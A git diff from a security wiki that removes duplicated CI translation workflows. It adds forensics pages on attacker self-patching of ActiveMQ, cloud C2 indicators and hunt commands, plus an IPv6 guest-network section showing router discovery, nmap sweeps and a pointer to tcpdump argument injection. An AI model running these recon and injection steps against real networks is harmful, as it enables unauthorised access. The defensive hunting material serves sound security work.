echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to PL (Polish)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: pl
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Polish
BRANCH: pl
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Log in to AWS
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to PT (Portuguese)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: pt
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Portuguese
BRANCH: pt
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Log in to AWS
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to SR (Serbian)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: sr
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Serbian
BRANCH: sr
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Log in to AWS
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to SW (Swahili)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: sw
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Swahili
BRANCH: sw
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Log in to AWS
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to TR (Turkish)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: tr
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Turkish
BRANCH: tr
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Log in to AWS
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to UK (Ukrainian)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: uk
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Ukrainian
BRANCH: uk
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Log in to AWS
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to ZH (Chinese)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: zh
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Chinese
BRANCH: zh
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Log in to AWS
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -327,6 +327,7 @@
- [Android APK Checklist](mobile-pentesting/android-checklist.md)
- [Android Applications Pentesting](mobile-pentesting/android-app-pentesting/README.md)
- [Accessibility Services Abuse](mobile-pentesting/android-app-pentesting/accessibility-services-abuse.md)
- [Android Anti Instrumentation And Ssl Pinning Bypass](mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md)
- [Android Applications Basics](mobile-pentesting/android-app-pentesting/android-applications-basics.md)
- [Android Task Hijacking](mobile-pentesting/android-app-pentesting/android-task-hijacking.md)
- [ADB Commands](mobile-pentesting/android-app-pentesting/adb-commands.md)

View File

@ -2,15 +2,23 @@
{{#include ../../banners/hacktricks-training.md}}
## [**Shells - Linux**](linux.md)
## [Shells - Linux](linux.md)
## [**Shells - Windows**](windows.md)
---
## [**MSFVenom - CheatSheet**](msfvenom.md)
## [Shells - Windows](windows.md)
## [**Full TTYs**](full-ttys.md)
---
## **Auto-generated shells**
## [MSFVenom - CheatSheet](msfvenom.md)
---
## [Full TTYs](full-ttys.md)
---
## Auto-generated shells
- [**https://reverse-shell.sh/**](https://reverse-shell.sh/)
- [**https://www.revshells.com/**](https://www.revshells.com/)

View File

@ -226,6 +226,81 @@ and alert on kernel-service creation from user-writable paths.
---
## Linux Anti-Forensics: Self-Patching and Cloud C2 (2023-2025)
### Self-patching compromised services to reduce detection (Linux)
Adversaries increasingly “self-patch” a service right after exploiting it to both prevent re-exploitation and suppress vulnerability-based detections. The idea is to replace vulnerable components with the latest legitimate upstream binaries/JARs, so scanners report the host as patched while persistence and C2 remain.
Example: Apache ActiveMQ OpenWire RCE (CVE-2023-46604)
- Post-exploitation, attackers fetched legitimate JARs from Maven Central (repo1.maven.org), deleted vulnerable JARs in the ActiveMQ install, and restarted the broker.
- This closed the initial RCE while maintaining other footholds (cron, SSH config changes, separate C2 implants).
Operational example (illustrative)
```bash
# ActiveMQ install root (adjust as needed)
AMQ_DIR=/opt/activemq
cd "$AMQ_DIR"/lib
# Fetch patched JARs from Maven Central (versions as appropriate)
curl -fsSL -O https://repo1.maven.org/maven2/org/apache/activemq/activemq-client/5.18.3/activemq-client-5.18.3.jar
curl -fsSL -O https://repo1.maven.org/maven2/org/apache/activemq/activemq-openwire-legacy/5.18.3/activemq-openwire-legacy-5.18.3.jar
# Remove vulnerable files and ensure the service uses the patched ones
rm -f activemq-client-5.18.2.jar activemq-openwire-legacy-5.18.2.jar || true
ln -sf activemq-client-5.18.3.jar activemq-client.jar
ln -sf activemq-openwire-legacy-5.18.3.jar activemq-openwire-legacy.jar
# Apply changes without removing persistence
systemctl restart activemq || service activemq restart
```
Forensic/hunting tips
- Review service directories for unscheduled binary/JAR replacements:
- Debian/Ubuntu: `dpkg -V activemq` and compare file hashes/paths with repo mirrors.
- RHEL/CentOS: `rpm -Va 'activemq*'`
- Look for JAR versions present on disk that are not owned by the package manager, or symbolic links updated out of band.
- Timeline: `find "$AMQ_DIR" -type f -printf '%TY-%Tm-%Td %TH:%TM %p\n' | sort` to correlate ctime/mtime with compromise window.
- Shell history/process telemetry: evidence of `curl`/`wget` to `repo1.maven.org` or other artifact CDNs immediately after initial exploitation.
- Change management: validate who applied the “patch” and why, not only that a patched version is present.
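As a concrete sketch of the package-ownership tip, something like the following can flag out-of-band JAR swaps (a minimal example assuming a Debian-based host and the `AMQ_DIR` path from above; the cutoff date is a placeholder for your compromise window):
```bash
# JARs in the install dir that no package owns - typical of manual "self-patching"
AMQ_DIR=/opt/activemq
for f in "$AMQ_DIR"/lib/*.jar; do
  dpkg -S "$f" >/dev/null 2>&1 || echo "UNOWNED: $f"
done
# Symlinks retargeted during the suspected compromise window
find "$AMQ_DIR"/lib -type l -newermt '2025-08-01' -printf '%p -> %l (%TY-%Tm-%Td)\n'
```
Note that on tarball installs nothing is package-owned, so baseline against a known-good copy or upstream hashes instead.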
### Cloud-service C2 with bearer tokens and anti-analysis stagers
Observed tradecraft combined multiple long-haul C2 paths and anti-analysis packaging:
- Password-protected PyInstaller ELF loaders to hinder sandboxing and static analysis (e.g., encrypted PYZ, temporary extraction under `/_MEI*`).
- Indicators: `strings` hits such as `PyInstaller`, `pyi-archive`, `PYZ-00.pyz`, `MEIPASS`.
- Runtime artifacts: extraction to `/tmp/_MEI*` or custom `--runtime-tmpdir` paths.
- Dropbox-backed C2 using hardcoded OAuth Bearer tokens
- Network markers: `api.dropboxapi.com` / `content.dropboxapi.com` with `Authorization: Bearer <token>`.
- Hunt in proxy/NetFlow/Zeek/Suricata for outbound HTTPS to Dropbox domains from server workloads that do not normally sync files.
- Parallel/backup C2 via tunneling (e.g., Cloudflare Tunnel `cloudflared`), keeping control if one channel is blocked.
- Host IOCs: `cloudflared` processes/units, config at `~/.cloudflared/*.json`, outbound 443 to Cloudflare edges.
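A minimal triage sketch combining these markers (the ELF name and interface are placeholders, not observed IOCs):
```bash
# PyInstaller packaging indicators in a suspect ELF (indicators, not proof)
strings -a suspect.elf | grep -E 'PyInstaller|pyi-archive|PYZ-00\.pyz|MEIPASS'
ls -ld /tmp/_MEI* 2>/dev/null   # extraction dirs left behind by running loaders
# TLS SNI to Dropbox API endpoints from a workload that should not sync files
tshark -i eth0 -Y 'tls.handshake.extensions_server_name contains "dropboxapi.com"' \
  -T fields -e ip.src -e tls.handshake.extensions_server_name
```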
### Persistence and “hardening rollback” to maintain access (Linux examples)
Attackers frequently pair self-patching with durable access paths:
- Cron/Anacron: edits to the `0anacron` stub in each `/etc/cron.*/` directory for periodic execution.
- Hunt:
```bash
for d in /etc/cron.*; do [ -f "$d/0anacron" ] && stat -c '%n %y %s' "$d/0anacron"; done
grep -R --line-number -E 'curl|wget|python|/bin/sh' /etc/cron.*/* 2>/dev/null
```
- SSH configuration hardening rollback: enabling root logins and altering default shells for low-privileged accounts.
- Hunt for root login enablement:
```bash
grep -E '^\s*PermitRootLogin' /etc/ssh/sshd_config
# flag values like "yes" or overly permissive settings
```
- Hunt for suspicious interactive shells on system accounts (e.g., `games`):
```bash
awk -F: '($7 ~ /bin\/(sh|bash|zsh)/ && $1 ~ /^(games|lp|sync|shutdown|halt|mail|operator)$/) {print}' /etc/passwd
```
- Random, short-named beacon artifacts (8 alphabetical chars) dropped to disk that also contact cloud C2:
- Hunt:
```bash
find / -maxdepth 3 -type f -regextype posix-extended -regex '.*/[A-Za-z]{8}$' \
-exec stat -c '%n %s %y' {} \; 2>/dev/null | sort
```
Defenders should correlate these artifacts with external exposure and service patching events to uncover anti-forensic self-remediation used to hide initial exploitation.
## References
- Sophos X-Ops “AuKill: A Weaponized Vulnerable Driver for Disabling EDR” (March 2023)
@ -233,6 +308,9 @@ and alert on kernel-service creation from user-writable paths.
- Red Canary “Patching EtwEventWrite for Stealth: Detection & Hunting” (June 2024)
https://redcanary.com/blog/etw-patching-detection
- [Red Canary - Patching for persistence: How DripDropper Linux malware moves through the cloud](https://redcanary.com/blog/threat-intelligence/dripdropper-linux-malware/)
- [CVE-2023-46604 - Apache ActiveMQ OpenWire RCE (NVD)](https://nvd.nist.gov/vuln/detail/CVE-2023-46604)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -213,6 +213,38 @@ cat /var/spool/cron/crontabs/* \
ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/
```
#### Hunt: Cron/Anacron abuse via 0anacron and suspicious stubs
Attackers often edit the 0anacron stub present under each /etc/cron.*/ directory to ensure periodic execution.
```bash
# List 0anacron files and their timestamps/sizes
for d in /etc/cron.*; do [ -f "$d/0anacron" ] && stat -c '%n %y %s' "$d/0anacron"; done
# Look for obvious execution of shells or downloaders embedded in cron stubs
grep -R --line-number -E 'curl|wget|/bin/sh|python|bash -c' /etc/cron.*/* 2>/dev/null
```
#### Hunt: SSH hardening rollback and backdoor shells
Changes to sshd_config and system account shells are common post-exploitation to preserve access.
```bash
# Root login enablement (flag "yes" or lax values)
grep -E '^\s*PermitRootLogin' /etc/ssh/sshd_config
# System accounts with interactive shells (e.g., games → /bin/sh)
awk -F: '($7 ~ /bin\/(sh|bash|zsh)/ && $1 ~ /^(games|lp|sync|shutdown|halt|mail|operator)$/) {print}' /etc/passwd
```
#### Hunt: Cloud C2 markers (Dropbox/Cloudflare Tunnel)
- Dropbox API beacons typically use api.dropboxapi.com or content.dropboxapi.com over HTTPS with Authorization: Bearer tokens.
- Hunt in proxy/Zeek/NetFlow for unexpected Dropbox egress from servers.
- Cloudflare Tunnel (`cloudflared`) provides backup C2 over outbound 443.
```bash
ps aux | grep -E '[c]loudflared|trycloudflare'
systemctl list-units | grep -i cloudflared
```
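Where Zeek is deployed, a quick sketch for the Dropbox-egress hunt (log path and parsing assume a default TSV ssl.log layout):
```bash
# TLS connections per source host to Dropbox API endpoints
zcat /opt/zeek/logs/*/ssl.*.log.gz 2>/dev/null \
  | zeek-cut id.orig_h server_name \
  | grep -E 'dropboxapi\.com$' \
  | sort | uniq -c | sort -rn
```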
### Services
Paths where a malware could be installed as a service:
@ -396,6 +428,8 @@ git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/
- [https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203](https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203)
- **Book: Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides**
- [Red Canary Patching for persistence: How DripDropper Linux malware moves through the cloud](https://redcanary.com/blog/threat-intelligence/dripdropper-linux-malware/)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -280,11 +280,12 @@ from scapy.all import *
import argparse
p = argparse.ArgumentParser()
P = p.add_argument
P('-i','--interface',required=True)
P('--llip',required=True)
P('--dns',required=True,help='Fake DNS IPv6')
P('--lifetime',type=int,default=600)
P('--interval',type=int,default=5)
args = p.parse_args()
ra = (IPv6(src=args.llip,dst='ff02::1',hlim=255)/
@ -317,6 +318,58 @@ sudo mitm6 -i eth0 --no-ra # only DHCPv6 poisoning
* Disabling IPv6 on endpoints is a temporary workaround that often breaks modern services and hides blind spots; prefer L2 filtering instead.
### NDP Router Discovery on Guest/Public SSIDs and Management Service Exposure
Many consumer routers expose management daemons (HTTP(S), SSH/Telnet, TR-069, etc.) on all interfaces. In some deployments, the “guest/public” SSID is bridged to the WAN/core and is IPv6-only. Even if the router's IPv6 address changes on every boot, you can reliably learn it using NDP/ICMPv6 and then connect directly to the management plane from the guest SSID.
Typical workflow from a client connected to the guest/public SSID:
1) Discover the router via ICMPv6 Router Solicitation to the All-Routers multicast `ff02::2` and capture the Router Advertisement (RA):
```bash
# Listen for Router Advertisements (ICMPv6 type 134)
sudo tcpdump -vvv -i <IFACE> 'icmp6 and ip6[40]==134'
# Provoke an RA by sending a Router Solicitation to ff02::2
python3 - <<'PY'
from scapy.all import *
send(IPv6(dst='ff02::2')/ICMPv6ND_RS(), iface='<IFACE>')
PY
```
The RA reveals the router's link-local and often a global address/prefix. If only a link-local is known, remember that connections must specify the zone index, e.g. `ssh -6 admin@[fe80::1%wlan0]`.
Alternative: use ndisc6 suite if available:
```bash
# rdisc6 sends RS and prints RAs in a friendly way
rdisc6 <IFACE>
```
2) Reach exposed services over IPv6 from the guest SSID:
```bash
# SSH/Telnet example (replace with discovered address)
ssh -6 admin@[2001:db8:abcd::1]
# Web UI over IPv6
curl -g -6 -k 'http://[2001:db8:abcd::1]/'
# Fast IPv6 service sweep
nmap -6 -sS -Pn -p 22,23,80,443,7547 2001:db8:abcd::1
```
3) If the management shell provides packet-capture tooling via a wrapper (e.g., tcpdump), check for argument/filename injection that allows passing extra tcpdump flags like `-G/-W/-z` to achieve post-rotate command execution. See:
{{#ref}}
../../linux-hardening/privilege-escalation/wildcards-spare-tricks.md
{{#endref}}
Defences/notes:
- Don't bind management to guest/public bridges; apply IPv6 firewalls on SSID bridges.
- Rate-limit and filter NDP/RS/RA on guest segments where feasible.
- For services that must be reachable, enforce authN/MFA and strong rate-limits.
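As an illustration of the first two points, a minimal nftables sketch (interface name and port list are assumptions; fully bridged SSIDs may additionally need bridge-family rules):
```bash
# Drop client-originated Router Advertisements and block IPv6 management ports from the guest segment
nft add table inet guestfw
nft add chain inet guestfw fwd '{ type filter hook forward priority 0 ; policy accept ; }'
nft add rule inet guestfw fwd iifname "wlan-guest" icmpv6 type nd-router-advert drop
nft add rule inet guestfw fwd iifname "wlan-guest" meta nfproto ipv6 tcp dport { 22, 23, 80, 443, 7547 } drop
```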
## References
@ -326,7 +379,6 @@ sudo mitm6 -i eth0 --no-ra # only DHCPv6 poisoning
- [http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html](http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html)
- [https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904](https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904)
